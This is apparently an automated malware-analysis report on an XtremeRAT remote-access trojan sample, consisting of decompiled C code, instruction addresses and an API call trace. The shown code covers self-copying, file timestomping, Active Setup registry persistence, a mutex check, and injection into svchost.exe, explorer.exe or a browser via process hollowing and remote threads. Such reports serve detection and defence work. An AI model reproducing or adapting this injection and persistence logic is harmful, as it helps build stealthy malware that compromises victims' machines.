					_t410 = E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t502);
					E00C82F90(0x80000001, _t96, _t502, 2, 0xc8f8b4); // executed
					if( *0xc8f5bc == 1) {
						E00C88918(_t410, _t473, 0xc8fccc);
					}
					if( *0xc8f5c9 == 1) {
						_t311 = E00C89840();
						_t505 = _t311;
						if(_t311 == 0) {
							E00C898DC(0xc8e07c);
						}
					}
					GetModuleFileNameW(0, 0xc8fac0, 0x20a);
					_t101 = E00C84914(0xc8fac0, _t345, 0xc8e07c, _t473, _t482); // executed
					_t346 = _t101;
					E00C84B88(_t101, 0xc8e07c);
					 *0xc8f898 = E00C833A8(_t101, 0xc8a704, _t505);
					_t506 =  *0xc8f2b1 - 1;
					if( *0xc8f2b1 == 1) {
						SetFileAttributesW( *0xc8f898, 0x80); // executed
						SetFileAttributesW(E00C836D8( *0xc8f898, _t506), 0x80); // executed
						E00C81248();
						_push(_t486);
						_push(0xc8a01f);
						_push( *[fs:eax]);
						 *[fs:eax] = _t490;
						_push(E00C812A4(0x1b) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xb) + 1);
						_t279 = E00C812A4(6);
						_pop(_t383); // executed
						E00C83BC4( *0xc8f898, _t346, _t383, _t279 + 0x7d1); // executed
						_pop(_t457);
						 *[fs:eax] = _t457;
						_push(_t486);
						_push(0xc8a09d);
						_push( *[fs:eax]);
						 *[fs:eax] = _t490;
						_push(E00C812A4(0x1b) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xb) + 1);
						_push(E00C812A4(6) + 0x7d1);
						_t303 = E00C836D8( *0xc8f898, _t506);
						_pop(_t458);
						_pop(_t386); // executed
						E00C83BC4(_t303, _t346, _t386, _t458); // executed
						_pop(_t459);
						 *[fs:eax] = _t459;
						E00C83674( *0xc8f898);
						E00C83674(E00C836D8( *0xc8f898, _t506));
					}
					E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t506), _t506, 2,  *0xc8f898); // executed
					memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
					_t476 = 0xc8ec8a;
					E00C82E48( *0xc8f898);
					E00C82914(0xc914e8,  *0xc8f898);
					E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t506));
					E00C82914(0xc91b06, _t117);
					_t348 = E00C836D8( *0xc8f898, _t506);
					E00C82E48(_t348);
					E00C82914(0xc916f2, _t348);
					if( *0xc8f38a == 1) {
						_t240 = E00C8263C(0, 0, 0xc8f3da); // executed
						_t476 = _t240;
						_t508 = GetLastError() - 0xb7;
						if(_t508 == 0) {
							CloseHandle(_t476);
						} else {
							CloseHandle(_t476);
							 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t508);
							E00C8291C();
							E00C82E48( *0xc8f89c);
							E00C82914(0xc8fac0,  *0xc8f89c);
							 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t486);
							E00C83CE4( *0xc8f8ac, 0xc8fccc, E00C88EF8);
						}
					}
					E00C81CD8( &_v6204, 0x11, 0xc8f2b2);
					_t421 =  *0xc8b0dc; // 0x2ad9cc
					E00C81DBC(_v6204, _t421);
					if(_t508 != 0) {
						E00C81CD8( &_v6208, 0x11, 0xc8f2b2);
						_t423 =  *0xc8b0d8; // 0x2a7934
						E00C81DBC(_v6208, _t423);
						if(__eflags != 0) {
							 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t486);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								_t227 = E00C83A54( *0xc8f89c, 0xc8f8ac);
								__eflags = _t227;
								if(_t227 != 0) {
									 *0xc8f89c = E00C83B10( *0xc8f8ac);
								} else {
									 *0xc8f89c = E00C83094();
								}
								 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t486);
								__eflags =  *0xc8f8ac;
								if(__eflags == 0) {
									 *0xc8f89c = E00C83094();
									 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t486);
								}
							}
						} else {
							 *0xc8f89c = E00C83094();
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t486);
						}
					} else {
						 *0xc8f8ac = 0;
					}
					_t484 = 0;
					 *0xc8f8a8 = 0;
					_t509 =  *0xc8f2b0;
					if( *0xc8f2b0 != 0) {
						_t348 =  *0xc8f898;
						_t476 = E00C833A8(E00C83420(0, _t348, 0), 0xc8a704, _t509);
						if(E00C83960(_t348, E00C82E48(_t348), _t476) == 0) {
							SetFileAttributesW(_t476, 0x80);
							_t511 = E00C82E48(_t476) + _t219;
							E00C82914(0xc91d10, _t476);
							E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t476) + _t219), 0xc91f1c, _t486), 0xc91d10, E00C897F4);
						}
					}
					_t143 = E00C833A8(E00C836D8(0xc918fc, _t511), 0xc90fdc, _t511);
					_t427 =  *0xc8b0f0; // 0xc8e01c
					 *_t427 = _t143;
					_t144 =  *0xc8b0f0; // 0xc8e01c
					_t146 = E00C833A8( *_t144, L".xtr", _t511);
					_t429 =  *0xc8b0f0; // 0xc8e01c
					 *_t429 = _t146;
					_t147 =  *0xc8b0f0; // 0xc8e01c
					if(E00C835B0( *_t147) != 0 && E00C87B84(L"local", _t348, _t484) == 1) {
						_t514 =  *0xc8f8ac;
						if( *0xc8f8ac == 0) {
							GetModuleFileNameW(0, 0xc8fac0, 0x20a);
							 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t486);
						}
						_t433 =  *0xc8b0e4; // 0xc8e024
						_t190 =  *0xc8b0e8; // 0xc8e020
						E00C82B90( *_t190, _t348, L"XTREME",  *_t433 - 0x1e, _t476, _t484, _t514);
						E00C82E14( &_v6216, L"XTREME", 0, GetCurrentProcessId(), 0);
						E00C81D10( &_v6212, _v6216, L"SOFTWARE\\", _t514);
						E00C82F90(0x80000001, E00C81CF4(_v6212), _t514, 2, 0xc90fdc);
						CloseHandle( *0xc8f8b0);
						_t204 =  *0xc8b0e8; // 0xc8e020
						_t429 = 0;
						E00C84600( *_t204, 0xc8f8ac, 0, 0, 0xc91f1c);
						Sleep(0x3e8);
						ExitProcess(0);
					}
					_t516 =  *0xc8f8ac;
					if( *0xc8f8ac != 0) {
						CloseHandle( *0xc8f8b0);
						while(1) {
							_t430 = E00C88BC0;
							 *0xc8f8a8 = E00C83CE4( *0xc8f8ac, 0xc8fccc, E00C88BC0);
							Sleep(0x1f4); // executed
							__eflags =  *0xc8f8a8;
							if( *0xc8f8a8 == 0) {
								_t177 =  *0xc8b0e0; // 0xc8b000
								TerminateProcess( *0xc8f8ac,  *_t177);
								_t430 = 0xc91f1c;
								 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t486);
							}
							_t484 = _t484 + 1;
							_t154 = E00C8263C(0, 0, 0xc8f38c); // executed
							_t477 = _t154;
							_t155 = GetLastError();
							__eflags = _t155 - 0xb7;
							_t348 = _t348 & 0xffffff00 | _t155 == 0x000000b7;
							CloseHandle(_t154);
							__eflags = _t348;
							if(_t348 == 0) {
								_t171 =  *0xc8b0e0; // 0xc8b000
								TerminateProcess( *0xc8f8ac,  *_t171);
								_t430 = 0xc91f1c;
								 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t486);
							}
							__eflags = _t484 - 7;
							if(_t484 >= 7) {
								break;
							}
							__eflags = _t348 - 1;
							if(_t348 != 1) {
								continue;
							}
							break;
						}
						E00C840F8(0xc8e07c, _t348, _t430, _t477, _t484); // executed
						__eflags =  *0xc8f8a8;
						if(__eflags == 0) {
							_t166 =  *0xc8b0e0; // 0xc8b000
							TerminateProcess( *0xc8f8ac,  *_t166);
							E00C88BC0(_t348, _t477, _t484, __eflags, 0xc8fccc);
						}
						__eflags = _t484 - 7;
						if(_t484 >= 7) {
							__eflags = _t348;
							if(_t348 == 0) {
								ShellExecuteW(0, L"open",  *0xc8f898, 0, 0, 0);
							}
						}
						goto L60;
					} else {
						CloseHandle( *0xc8f8b0);
						E00C840F8(0xc8e07c, _t348, _t429, _t476, _t484);
						E00C88BC0(_t348, _t476, _t484, _t516, 0xc8fccc);
						L60:
						_pop(_t431);
						 *[fs:eax] = _t431;
						_push(0xc8a632);
						E00C81B90( &_v6216, 5);
						return E00C81B78( &_v24);
					}
				} else {
					do {
						Sleep(0x3e8);
						_t482 = _t482 - 1;
						_t502 = _t482;
					} while (_t482 > 0);
					goto L15;
				}
			}

0x00c89aee
0x00c89aee
0x00c89af0
0x00c89af2
0x00c89af4
0x00c89af5
0x00c89afd
0x00c89b02
0x00c89b06
0x00c89b0a
0x00c89b0e
0x00c89b12
0x00c89b16
0x00c89b1a
0x00c89b1e
0x00c89b22
0x00c89b26
0x00c89b2a
0x00c89b2e
0x00c89b32
0x00c89b36
0x00c89b3a
0x00c89b3e
0x00c89b42
0x00c89b46
0x00c89b4a
0x00c89b4e
0x00c89b52
0x00c89b56
0x00c89b5a
0x00c89b5e
0x00c89b62
0x00c89b66
0x00c89b6a
0x00c89b6e
0x00c89b72
0x00c89b76
0x00c89b7a
0x00c89b7e
0x00c89b82
0x00c89b86
0x00c89b8a
0x00c89b92
0x00c89b96
0x00c89b9a
0x00c89b9e
0x00c89ba2
0x00c89ba5
0x00c89bad
0x00c89bae
0x00c89bb4
0x00c89bb5
0x00c89bb6
0x00c89bb9
0x00c89bbf
0x00c89bc5
0x00c89bcb
0x00c89bd1
0x00c89bd7
0x00c89bdf
0x00c89be6
0x00c89be7
0x00c89bec
0x00c89bef
0x00c89bf7
0x00c89bfc
0x00c89c01
0x00c89c09
0x00c89c10
0x00c89c24
0x00c89c2c
0x00c89c32
0x00c89c37
0x00c89c4e
0x00c89c55
0x00c89c55
0x00c89c63
0x00c89c68
0x00c89c6a
0x00c89c6f
0x00c89c74
0x00c89c7b
0x00c89c7b
0x00c89c81
0x00c89c90
0x00c89c9d
0x00c89ca2
0x00c89cb2
0x00c89cb2
0x00c89cb2
0x00c89cc3
0x00c89cd2
0x00c89ce6
0x00c89cea
0x00c89cef
0x00c89cf1
0x00c89d3c
0x00c89cf3
0x00c89d0d
0x00c89d0d
0x00c89d40
0x00c89d45
0x00c89d47
0x00c89d53
0x00c89d64
0x00c89d6a
0x00c89d72
0x00c89d87
0x00c89d96
0x00c89dab
0x00c89dba
0x00c89dc2
0x00c89dc8
0x00c89dd7
0x00c89de4
0x00c89de9
0x00c89df9
0x00c89df9
0x00c89df9
0x00c89e0a
0x00c89e0a
0x00c89dba
0x00c89e15
0x00c89e1b
0x00c89e2a
0x00c89e3e
0x00c89e52
0x00c89e66
0x00c89e6d
0x00c89e7b
0x00c89e80
0x00c89e8f
0x00c89e93
0x00c89e93
0x00c89e98
0x00c89ea0
0x00c89eb1
0x00c89eb9
0x00c89ec4
0x00c89ed4
0x00c89ede
0x00c89ef9
0x00c89f05
0x00c89f11
0x00c89f18
0x00c89f18
0x00c89f24
0x00c89f26
0x00c89f2b
0x00c89f2d
0x00c89f34
0x00c89f34
0x00c89f2d
0x00c89f45
0x00c89f54
0x00c89f59
0x00c89f62
0x00c89f73
0x00c89f78
0x00c89f7f
0x00c89f90
0x00c89fa5
0x00c89faa
0x00c89fb1
0x00c89fb2
0x00c89fb7
0x00c89fba
0x00c89fc8
0x00c89fd4
0x00c89fe0
0x00c89fec
0x00c89ff8
0x00c89ffe
0x00c8a00f
0x00c8a010
0x00c8a017
0x00c8a01a
0x00c8a02b
0x00c8a02c
0x00c8a031
0x00c8a034
0x00c8a042
0x00c8a04e
0x00c8a05a
0x00c8a066
0x00c8a072
0x00c8a081
0x00c8a087
0x00c8a08c
0x00c8a08d
0x00c8a08e
0x00c8a095
0x00c8a098
0x00c8a0ac
0x00c8a0bb
0x00c8a0bb
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0fe
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a178
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b9
0x00c8a1cd
0x00c8a1e1
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a53e
0x00c8a543
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a58d
0x00c8a592
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a
0x00c89ea2
0x00c89ea2
0x00c89ea7
0x00c89eac
0x00c89ead
0x00c89ead
0x00000000
0x00c89ea2

APIs

Part of subcall function 00C82504: GetModuleHandleA.KERNEL32(00000000,?,00C89BE4), ref: 00C82510

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B4D
Part of subcall function 00C83B10: GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

SetErrorMode.KERNEL32(00008007,00000000,00C8A62B), ref: 00C89C09
Sleep.KERNEL32(00000064,00008007,00000000,00C8A62B), ref: 00C89C10

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C89C4E
ExitProcess.KERNEL32(00000000,00000064,00008007,00000000,00C8A62B), ref: 00C89C55

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89C6A
Sleep.KERNEL32(00001770,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89C7B
CloseHandle.KERNEL32(00000000), ref: 00C89C81

Part of subcall function 00C83FDC: FindResourceW.KERNEL32(00C80000,00000000,0000000A), ref: 00C83FF3
Part of subcall function 00C83FDC: SizeofResource.KERNEL32(00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84001
Part of subcall function 00C83FDC: LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C8400F
Part of subcall function 00C83FDC: LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84017
Part of subcall function 00C83FDC: FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C8402B

SHDeleteKeyW.SHLWAPI(80000001,SOFTWARE\XtremeRAT), ref: 00C89CD2

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89D53

Part of subcall function 00C835DC: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C83610
Part of subcall function 00C835DC: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8361F
Part of subcall function 00C835DC: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8363B
Part of subcall function 00C835DC: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C83649
Part of subcall function 00C835DC: ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C8365A
Part of subcall function 00C835DC: CloseHandle.KERNEL32(00000000), ref: 00C83660

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89DC2
DeleteFileW.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89DC8
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E15
DeleteFileW.KERNEL32(00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E1B

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

GetLastError.KERNEL32(00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E85
ExitProcess.KERNEL32(00000000,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E93
Sleep.KERNEL32(000003E8,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89EA7

Part of subcall function 00C89790: GetLocalTime.KERNEL32 ref: 00C89797
Part of subcall function 00C89790: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,00C8F8B4,000000FF), ref: 00C897B0
Part of subcall function 00C89790: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C897E0

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000), ref: 00C82FCE

GetModuleFileNameW.KERNEL32(00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE), ref: 00C89F45

Part of subcall function 00C84914: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C84A79
Part of subcall function 00C84914: CopyFileW.KERNEL32(00C8FAC0,00000000,00000000), ref: 00C84A8F
Part of subcall function 00C84914: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080), ref: 00C84B11
Part of subcall function 00C84914: CopyFileW.KERNEL32(00C8FAC0,00000000,00000000), ref: 00C84B27

SetFileAttributesW.KERNEL32(?,00000080,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C89F90
SetFileAttributesW.KERNEL32(00000000,00000080,?,00000080,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C89FA5

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83775

GetLastError.KERNEL32(00000000,00000000,00C8F3DA,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(?), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(?), ref: 00C83D77

GetModuleFileNameW.KERNEL32(00000000,00C8FAC0,0000020A,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000), ref: 00C8A416

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(?), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
